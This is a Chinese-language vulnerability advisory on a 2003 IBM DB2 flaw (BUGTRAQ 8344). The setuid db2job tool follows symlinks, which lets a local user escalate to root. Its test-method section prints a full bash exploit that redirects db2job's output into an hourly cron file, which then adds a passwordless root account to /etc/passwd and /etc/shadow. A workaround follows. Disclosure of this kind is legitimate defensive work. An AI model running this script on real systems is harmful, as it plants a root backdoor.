信息提供: | 安全公告(或线索)提供热线:51cto.editor@gmail.com |
漏洞类别: | SQL注入漏洞 |
攻击类型: | 本地越权访问 |
发布日期: | 2003-08-05 |
更新日期: | 2003-08-11 |
受影响系统: | IBM DB2 Universal Database for Linux 7.2 IBM DB2 Universal Database for Linux 7.1 IBM DB2 Universal Database for Linux 7.0 IBM DB2 Universal Database for Linux 6.0 IBM DB2 Universal Database for AIX 7.2 IBM DB2 Universal Database for AIX 7.1 IBM DB2 Universal Database for AIX 7.0 IBM DB2 Universal Database for AIX 6.1 IBM DB2 Universal Database for AIX 6.0 IBM DB2 Universal Database for HP-UX 7.2 IBM DB2 Universal Database for HP-UX 7.1 IBM DB2 Universal Database for HP-UX 7.0 IBM DB2 Universal Database for HP-UX 6.1 IBM DB2 Universal Database for HP-UX 6.0 IBM DB2 Universal Database for Solaris 7.2 IBM DB2 Universal Database for Solaris 7.1 IBM DB2 Universal Database for Solaris 7.0 IBM DB2 Universal Database for Solaris 6.1 IBM DB2 Universal Database for Solaris 6.0 IBM DB2 Universal Database for Linux 6.1 - Caldera Open Linux 2.4 - RedHat Linux 7.0 - SuSE Linux 7.0 - Turbo Linux 6.0.4 |
安全系统: | 无 |
漏洞报告人: | Juan Manuel Pascual Escriba (pask@hades2.concha.upv.es) |
漏洞描述: | BUGTRAQ ID: 8344 IBM DB2是一款由IBM公司开发的强大的数据库系统,适合于多种操作系统下使用。 IBM DB2包含的db2job二进制程序存在写权限检查错误,本地攻击者可以利用这个漏洞通过此工具写ROOT属主的任意文件。 db2job以4550权限安装,默认安装属组为root.db2asgrp。db2job会以root用户权限写多个文件,文件以0770权限建立,并属组为root.db2asgrp。如果攻击者建立符号连接,连接到系统重要文件,就可以通过此工具往系统敏感文件中写信息,可造成权限提升。 必须注意的是db2job默认不允许全局执行,因此攻击者必须有一定的帐户才能利用这个漏洞提升权限。 |
测试方法: | 警 告 #!/bin/bash DB2JOB=/home/db2as/sqllib/adm/db2job CRONFILE=/etc/cron.hourly/pakito USER=pakito unset DB2INSTANCE export DB2DIR=./trash if [ -d $DB2DIR ]; then echo Trash directory already created else mkdir $DB2DIR fi cd $DB2DIR if [ -f ./0_1.out ]; then echo Link Already Created else ln -s $CRONFILE ./0_1.out fi $DB2JOB echo "echo "#!/bin/bash"" > $CRONFILE echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE echo " must wait until cron execute $CRONFILE and then exec su pakito" |
解决方法: | 临时解决方法: 如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁: * 暂时关闭db2job默认的setuid权限,不过会因此缺少部分功能。 厂商补丁: IBM --- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.ers.ibm.com/ |
相关文章
